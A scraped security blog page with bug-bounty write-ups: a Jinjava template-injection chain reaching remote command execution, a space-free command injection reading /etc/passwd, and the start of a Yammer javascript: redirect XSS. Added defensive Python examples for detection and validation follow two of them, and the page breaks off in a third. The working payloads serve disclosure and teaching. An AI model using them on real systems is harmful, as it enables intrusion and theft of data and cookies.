<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Time to find an alternative.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">First option: </span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">java.lang.System</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('java.lang.System').newInstance()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">TemplateSyntaxException: java.lang.IllegalAccessException: Class javax.el.BeanELResolver can not access a member of class java.lang.System with modifiers "private"</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Arrggh... one more candidate lost.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">After frantic searches and asking around, I found this <a href="https://srcincite.io/blog/2017/05/22/from-serialized-to-shell-auditing-google-web-toolkit-with-el-injection.html" target="_blank">gem</a> of a blog post, which introduced me to </span><span style="font-family: "courier new" , "courier" , monospace;">javax.script.ScriptEngineManager.</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br />Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">javax.script.ScriptEngineManager@727c1a89</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Amazing! Getting hold of a ScriptEngineManager object meant RCE was on the horizon.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">But before that, I had to get to know my new friend </span><span style="font-family: "courier new" , "courier" , monospace;"><a href="https://docs.oracle.com/javase/7/docs/api/javax/script/ScriptEngineManager.html" target="_blank">ScriptEngineManager</a>.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Find out what type of JavaScript engine this is</span><span style="font-family: "courier new" , "courier" , monospace;"> -</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript')}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">jdk.nashorn.api.scripting.NashornScriptEngine@7f97607a</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-fqem41QB84A/XAnoPqyqtoI/AAAAAAAAUOQ/aKhtq3mbb-AMXhpAG-qHxtX8rK3Iz0_0gCLcBGAs/s1600/javascript.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="" border="0" data-original-height="301" data-original-width="572" height="210" src="https://2.bp.blogspot.com/-fqem41QB84A/XAnoPqyqtoI/AAAAAAAAUOQ/aKhtq3mbb-AMXhpAG-qHxtX8rK3Iz0_0gCLcBGAs/s400/javascript.jpg" title="" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">A bounty writeup without a meme is not fun!</td></tr>
</tbody></table>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Get the script context - </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').getContext()}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">jdk.nashorn.api.scripting.NashornScriptEngine@7f97607a</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Get language name -</span><span style="font-family: "courier new" , "courier" , monospace;"> </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineFactories()[0].getLanguageName()}}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Output: ECMAScript</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Get language version -</span><span style="font-family: "courier new" , "courier" , monospace;"> </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineFactories()[0].getLanguageVersion()}}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Output: ECMA - 262 Edition 5.1</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Now go for the kill.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">To get RCE using the ScriptEngineManager, you have to call the ever so useful "eval" method with some Java code thrown into it.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">After a lot of trial and error, I finally got eval to work.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">xxx</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">I successfully evaluated dynamic Java code using a ScriptEngineManager instance! </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Now I only needed to substitute real code that would execute system commands and throw it into eval.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">After another trial and error session, I finally had some success -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload: </span><span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">java.lang.UNIXProcess@1e5f456e</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Woot! The output was a reference to a UNIXProcess object, which means my command was successfully executed! I could have run a reverse shell command at this point and obtained a shell, but since I was able to see output, I decided to push this a little further and get the command's output in the response itself.</span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Another frantic search session resulted with the discovery of <a href="https://commons.apache.org/proper/commons-io/javadocs/api-2.5/org/apache/commons/io/IOUtils.html" target="_blank">org.apache.commons.io.IOUtils</a>. This class provides static utility methods for input/output operations.</span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">My final payload was -</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output:</span><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> See for yourselves!</span><br />
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-fil_72ncQ0A/XAnwN-GUrZI/AAAAAAAAUOk/GsTCTH17lRAlw2ZlH5Zr99EwDDEy-ZjRgCEwYBhgL/s1600/netstat-output.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="1583" height="640" src="https://2.bp.blogspot.com/-fil_72ncQ0A/XAnwN-GUrZI/AAAAAAAAUOk/GsTCTH17lRAlw2ZlH5Zr99EwDDEy-ZjRgCEwYBhgL/s640/netstat-output.png" width="632" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Bingpot!</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">It took me a few more tries to learn how to pass multiple arguments to the commands.</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Notice the x.command function! -</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Payload:</span><span style="font-family: "courier new" , "courier" , monospace;"> {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Output: </span><span style="font-family: "courier new" , "courier" , monospace;">Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux\n</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">As you can imagine, it was quite a struggle, but in the end I had a lot of fun and learnt a lot in the process. The Jinjava project was introduced by Hubspot back in <a href="https://product.hubspot.com/blog/jinjava-a-jinja-for-your-java" target="_blank">2014</a>, which means this bug had been around for 4 years and nobody had found it (hopefully). The Hubspot team was very receptive and fixed it very fast by disabling the "getClass" method on a variable. You can find the fix <a href="https://github.com/HubSpot/jinjava/pull/230" target="_blank">here</a>.</span><br />
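<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">From the defender's side, the gadget chain above is also a detection signature: every working payload needs a reflection entry point, class loading, a script engine and finally code evaluation inside one template expression. The following Python script is an added example, not code from the original post or from the Jinjava project; the log lines it scans are constructed, and it assumes a Jinjava-style template lands in a request body or query string.</span><br />

```python
import re
from urllib.parse import unquote_plus

# Each indicator is one step of the gadget chain walked through in the post:
# reflection entry point, class loading, instantiation, script engine,
# code evaluation and process control. Several steps in a single
# expression is far more telling than any one of them alone.
INDICATORS = {
    "getclass": re.compile(r"\.getClass\s*\("),
    "forname": re.compile(r"\.forName\s*\("),
    "newinstance": re.compile(r"\.newInstance\s*\("),
    "scriptengine": re.compile(r"ScriptEngineManager"),
    "eval": re.compile(r"\.eval\s*\("),
    "process": re.compile(r"ProcessBuilder|java\.lang\.Runtime"),
}

# Jinjava expression delimiters; DOTALL so a chain split across lines still matches.
EXPRESSION = re.compile(r"\{\{(.*?)\}\}", re.S)


def find_template_gadgets(text):
    """Return the set of indicator names found inside {{ ... }} expressions.

    The text is URL-decoded first because payloads usually arrive in a
    query string or form body, where '(' and '{' are percent-encoded.
    """
    decoded = unquote_plus(text)
    hits = set()
    for expr in EXPRESSION.findall(decoded):
        for name, pattern in INDICATORS.items():
            if pattern.search(expr):
                hits.add(name)
    return hits


def classify(hits):
    """Map indicator hits to a severity label.

    rce        - the chain reached code evaluation or process control
    reflection - the chain got as far as loading or instantiating a class
    probe      - a bare getClass() call, typical of early reconnaissance
    none       - nothing suspicious
    """
    if hits & {"eval", "process"}:
        return "rce"
    if hits & {"forname", "newinstance", "scriptengine"}:
        return "reflection"
    if "getclass" in hits:
        return "probe"
    return "none"


def scan_log(lines):
    """Scan access-log style lines; return (line_no, severity, indicators) per hit."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        hits = find_template_gadgets(line)
        severity = classify(hits)
        if severity != "none":
            findings.append((line_no, severity, sorted(hits)))
    return findings


# Constructed sample log lines (not taken from the original post): a benign
# template, a getClass() probe, a class-loading attempt, and a URL-encoded
# chain that reaches ProcessBuilder through the script engine.
SAMPLE_LOG = [
    '10.0.0.5 - - "POST /template HTTP/1.1" body="Hello {{ user.name }}"',
    "10.0.0.7 - - \"POST /template HTTP/1.1\" body=\"{{'a'.getClass().getName()}}\"",
    "10.0.0.8 - - \"POST /template HTTP/1.1\" "
    "body=\"{{'a'.getClass().forName('java.lang.System').newInstance()}}\"",
    '10.0.0.9 - - "GET /render?tpl=%7B%7B%27a%27.getClass%28%29'
    ".forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29"
    ".getEngineByName%28%27JavaScript%27%29.eval%28%22new+java.lang.ProcessBuilder%22%29"
    '%7D%7D HTTP/1.1"',
]

if __name__ == "__main__":
    for line_no, severity, indicators in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {severity} ({', '.join(indicators)})")
```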
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><b>Bonus</b><br /><br />A couple of days after fixing the vulnerability, Hubspot informed me that since "<a href="https://github.com/HubSpot/jinjava">Jinjava</a>" - an open source project - is being used by many other companies apart from Hubspot, they have applied for a CVE and I will be credited in it for the discovery of this issue! Sweet!</span></div>
<div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">References:</span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">1. <a href="https://srcincite.io/blog/2017/05/22/from-serialized-to-shell-auditing-google-web-toolkit-with-el-injection.html" target="_blank">https://srcincite.io/blog/2017/05/22/from-serialized-to-shell-auditing-google-web-toolkit-with-el-injection.html</a></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">2. <a href="https://portswigger.net/blog/server-side-template-injection" target="_blank">https://portswigger.net/blog/server-side-template-injection</a> </span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">3. <a href="http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/" target="_blank">http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/</a></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">4. <a href="https://blog.mindedsecurity.com/2015/11/reliable-os-shell-with-el-expression.html" target="_blank">https://blog.mindedsecurity.com/2015/11/reliable-os-shell-with-el-expression.html</a></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4538251661335272060.post-44211492414721028932016-10-02T13:31:00.001+05:302016-10-17T10:28:01.440+05:30Command Injection Without Spaces<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: "verdana" , sans-serif;">I came across a nice little command injection vulnerability while doing a bug bounty recently. The only catch was that I couldn't use any spaces in the commands. Let me go into the details...</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">Note: I can't post any details about the application as it was a private bounty program.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">It all began with the page providing an input box for doing 'nslookup' of a domain or IP entered by the user.</span><br />
<span style="font-family: "verdana" , sans-serif;">A page like this always excites a bug bounty hunter, because the application has to pass the user's input to an underlying system command to perform the nslookup and then present that command's output in the browser. If the developer has made any mistake in validating and sanitizing the input, they have inadvertently opened the door to attackers misusing this feature to execute arbitrary commands on the server.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">So, when I saw the input box, I started exploring and trying to force the application into executing arbitrary commands.</span><br />
<span style="font-family: "verdana" , sans-serif;">I began with the simple input <span style="background-color: #fff2cc;">google.com</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-Bbl2CTUpp2k/V_CxJCcH2WI/AAAAAAAAL9c/QWPUUcoqVrM2w0kth0gw46xrpfTBQlfVQCLcB/s1600/blog-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "verdana" , sans-serif;"><img border="0" height="219" src="https://4.bp.blogspot.com/-Bbl2CTUpp2k/V_CxJCcH2WI/AAAAAAAAL9c/QWPUUcoqVrM2w0kth0gw46xrpfTBQlfVQCLcB/s640/blog-1.png" width="640" /></span></a></div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">My next automatic try was the input <span style="background-color: #fff2cc;">google.com && ls</span></span><br />
<span style="font-family: "verdana" , sans-serif;">This returned the same output as above, meaning the application ignored the additional command I had provided. The same story continued for all my tries, such as <span style="background-color: #fff2cc;">google.com || ls</span></span><br />
<span style="font-family: "verdana" , sans-serif;">When I tried the input <span style="background-color: #fff2cc;">google.com>/tmp/test.txt</span>, the output window came back blank, which was strange. This suggested that the application might be filtering spaces, so I tried the same commands without spaces and...</span><br />
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-0b9y547OHYs/V_Cz8b9SlFI/AAAAAAAAL9s/MUKMoYRX4Z0XSS81s2StCrWPyWHcva7_ACK4B/s1600/blog-2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "verdana" , sans-serif;"><img border="0" height="216" src="https://2.bp.blogspot.com/-0b9y547OHYs/V_Cz8b9SlFI/AAAAAAAAL9s/MUKMoYRX4Z0XSS81s2StCrWPyWHcva7_ACK4B/s640/blog-2.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "verdana" , sans-serif;">Success!</span></td></tr>
</tbody></table>
<span style="font-family: "verdana" , sans-serif;">But the problem with spaces was still not solved. For the input <span style="background-color: #fff2cc;">google.com&&cat /etc/passwd</span> the application again ignored anything after the space.</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-5HEp8oXbF0g/V_C9n3S-rjI/AAAAAAAAL-o/mCmevY3T8Bw6pbW9bV1ana7es5ovSAlxwCK4B/s1600/blog-3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "verdana" , sans-serif;"><img border="0" height="225" src="https://4.bp.blogspot.com/-5HEp8oXbF0g/V_C9n3S-rjI/AAAAAAAAL-o/mCmevY3T8Bw6pbW9bV1ana7es5ovSAlxwCK4B/s640/blog-3.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "verdana" , sans-serif;">:(</span></td></tr>
</tbody></table>
<div>
<span style="font-family: "verdana" , sans-serif;">My next obvious move was to search Google for this issue, because if I was facing it, somebody must already have faced a similar situation. Needless to say, Google didn't disappoint.</span><br />
<div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">Enter "<a href="https://jon.oberheide.org/blog/2008/09/04/bash-brace-expansion-cleverness/" target="_blank">Bash Brace Expansion</a>". </span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">According to this, if you provide an input like the following in a bash terminal: <span style="background-color: #fff2cc;">{echo,hello,world}</span> it will execute the command <span style="background-color: #fff2cc;">echo hello world</span></span><br />
<div>
<span style="font-family: "verdana" , sans-serif;">That was neat, and a TIL moment for me.</span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">I tried it against my application, but it didn't succeed, probably because the application I was targeting ran on an embedded device and the shell was a BusyBox shell. More Googling <a href="http://lists.busybox.net/pipermail/busybox/2011-July/076170.html" target="_blank">confirmed</a> my suspicion.</span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;">So I was back to Google looking for a different solution. Then I came across this thread - <a href="http://seclists.org/pauldotcom/2012/q2/200">http://seclists.org/pauldotcom/2012/q2/200</a></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">According to this, you can execute commands without spaces like this: <span style="background-color: #fff2cc;">CMD=$'\x20a\x20b\x20c';echo$CMD</span></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: "verdana" , sans-serif;">Look at the cleverness of that! More TIL!</span></div>
</div>
</div>
</div>
<div>
<span style="font-family: "verdana" , sans-serif;">Here, CMD is an environment variable containing encoded spaces. On running that, we get <span style="background-color: #fff2cc;">echo a b c</span></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "verdana" , sans-serif;">Now, I tried that in my application with a little modification:<span style="background-color: #fff2cc;"> CMD=$'\x20a\x20b\x20c'&&echo$CMD</span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-atd0pG_Iq68/V_C9Nc8JxdI/AAAAAAAAL-c/wMQrVhYk3Lg4daGjV7sPFv1gPx9xAyA1QCK4B/s1600/blog-4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "verdana" , sans-serif;"><img border="0" height="216" src="https://1.bp.blogspot.com/-atd0pG_Iq68/V_C9Nc8JxdI/AAAAAAAAL-c/wMQrVhYk3Lg4daGjV7sPFv1gPx9xAyA1QCK4B/s640/blog-4.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "verdana" , sans-serif;">Bingo!</span></td></tr>
</tbody></table>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<span style="font-family: "verdana" , sans-serif;">From here, executing arbitrary commands was a cakewalk. Input <span style="background-color: #fff2cc;">google.com&&CMD=$'\x20/etc/passwd'&&cat$CMD</span></span><br />
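<span style="font-family: "verdana" , sans-serif;">The lesson for anyone building such a lookup page is that stripping spaces is not input validation: the shell still parses <span style="background-color: #fff2cc;">&&</span>, <span style="background-color: #fff2cc;">$'\x20'</span> and friends. The Python below is an added example and not the vulnerable application's code; it contrasts a naive "no spaces" filter with an allowlist check and a shell-free process launch, using constructed inputs taken from the tries described above. The function names are hypothetical.</span><br />

```python
import re
import subprocess

# Strict allowlist for what an nslookup box should accept: a DNS hostname
# (labels of letters, digits and hyphens, joined by dots, no leading or
# trailing hyphen) or a dotted-quad IPv4 address. Nothing else gets through.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
IPV4 = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")


def naive_filter_accepts(user_input):
    """The kind of check the post ran into: reject the input only if it contains
    a space. Shell metacharacters such as & ; $ and ' pass straight through,
    and so does $'\\x20', which the shell turns back into a space."""
    return " " not in user_input


def is_safe_lookup_target(user_input):
    """Allowlist check: only a well-formed hostname or IPv4 address is accepted."""
    return bool(HOSTNAME.match(user_input) or IPV4.match(user_input))


def build_nslookup_argv(user_input):
    """Return the argv list for nslookup, or None if the input is rejected.

    Passing a list to subprocess without shell=True means no shell ever parses
    the value, so && chaining and $'\\x20' quoting have nothing to act on even
    if the allowlist were ever loosened.
    """
    if not is_safe_lookup_target(user_input):
        return None
    return ["nslookup", user_input]


def run_lookup(user_input, runner=subprocess.run):
    """Validate, then run nslookup without a shell. Returns stdout or None.

    `runner` is injectable so the logic can be exercised without a real
    nslookup binary on the machine.
    """
    argv = build_nslookup_argv(user_input)
    if argv is None:
        return None
    completed = runner(argv, capture_output=True, text=True, timeout=10)
    return completed.stdout


def evaluate(inputs):
    """Return {input: (naive_accepts, allowlist_accepts)} for each candidate."""
    return {s: (naive_filter_accepts(s), is_safe_lookup_target(s)) for s in inputs}


# Constructed inputs mirroring the attempts in the post: a legitimate lookup,
# a command chained without spaces, and the $'\x20' trick used to smuggle
# a space past the filter.
SAMPLE_INPUTS = [
    "google.com",
    "8.8.8.8",
    "google.com&&ls",
    "google.com&&cat /etc/passwd",
    "google.com&&CMD=$'\\x20/etc/passwd'&&cat$CMD",
]

if __name__ == "__main__":
    for value, (naive, strict) in evaluate(SAMPLE_INPUTS).items():
        print(f"{value!r}: naive={naive} allowlist={strict}")
```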
<div>
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<br />
<div>
<span style="font-family: "verdana" , sans-serif;"><br /></span></div>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-KJV6HIUHxjE/V_DB-AZWB8I/AAAAAAAAL-4/evXEa9XaCBw1OSgzUCwkxgCiyBb_KlpcwCK4B/s1600/blog-5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="218" src="https://1.bp.blogspot.com/-KJV6HIUHxjE/V_DB-AZWB8I/AAAAAAAAL-4/evXEa9XaCBw1OSgzUCwkxgCiyBb_KlpcwCK4B/s640/blog-5.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">/etc/passwd</td></tr>
</tbody></table>
<br /></div>
</div>
</div>
</div>
</div>
Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-4538251661335272060.post-40277675189961688622014-12-12T09:46:00.001+05:302014-12-12T09:46:40.827+05:30Curious case of Yammer XSS<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana, sans-serif;">Microsoft recently (finally!!) started a <a href="http://technet.microsoft.com/en-us/security/dn800983" rel="nofollow" target="_blank">bug bounty program</a> for some of its online services, and Yammer is in scope. Noticing this, I jumped on Yammer because it looked to be the easier target. This post is about a strange stored XSS I found in Yammer apps which would have allowed non-admin users to steal cookies from admin users and do other nasty stuff.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">To begin with, Yammer is a private social network that helps employees collaborate across departments, locations and business apps. </span><br />
<br />
<span style="font-family: Verdana, sans-serif;">Once logged in to Yammer, any user can create and publish apps to the organization's Apps directory. This process does not require authorization or approval. Apps are published to the app directory some time after they are created.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Apps can be created from https://www.yammer.com/client_applications.</span><br />
<span style="font-family: Verdana, sans-serif;">When registering the app, Yammer takes in a Redirect URI value, which is "the URL to redirect the user's browser to after the user has linked the application to their Yammer account".</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I put<b> javascript:alert(document.cookie)//</b> as the redirect URI.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In such cases, the browser does a 302 redirect to this Redirect URI. Due to security measures in browsers, it is generally not possible to abuse 302 redirects for XSS by redirecting to javascript or data URIs. Browsers won't redirect to javascript URIs even when one is in the Location header of the response. </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">In the case of Yammer, something strange was happening. When a user tried to use the app in Internet Explorer, the browser was properly doing a 302 redirect, hence blocking my JavaScript, but in Chrome and Firefox a 200 OK response was returned with my redirect URI in the response body. The browser would then try to load that URI and BINGO!! JavaScript executed successfully!</span><br />
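<span style="font-family: Verdana, sans-serif;">Whatever the browser quirk, the root cause is that a <b>javascript:</b> value was accepted as a redirect URI at registration time. The Python below is an added example, not Yammer's code, showing the check a registration endpoint should apply (absolute https only, host required, no fragment) plus an exact-match lookup at authorization time; the function names and sample URIs are constructed for illustration.</span><br />

```python
from urllib.parse import urlsplit

# Only absolute https URLs are acceptable as an OAuth-style redirect target.
# This rules out javascript: and data: URIs outright, regardless of whether
# the browser would later see them in a Location header or a response body.
ALLOWED_SCHEMES = {"https"}


def validate_redirect_uri(candidate):
    """Return (ok, reason) for a redirect URI submitted at app registration."""
    if not isinstance(candidate, str) or not candidate:
        return False, "empty"
    # Leading/trailing whitespace and control characters are how scheme checks
    # get bypassed in lenient parsers, so reject them before parsing at all.
    if candidate != candidate.strip() or any(
        ord(ch) < 0x20 or ch == "\x7f" for ch in candidate
    ):
        return False, "whitespace or control characters"
    try:
        parts = urlsplit(candidate)
        host = parts.hostname  # may raise ValueError on malformed IPv6 literals
    except ValueError:
        return False, "unparseable"
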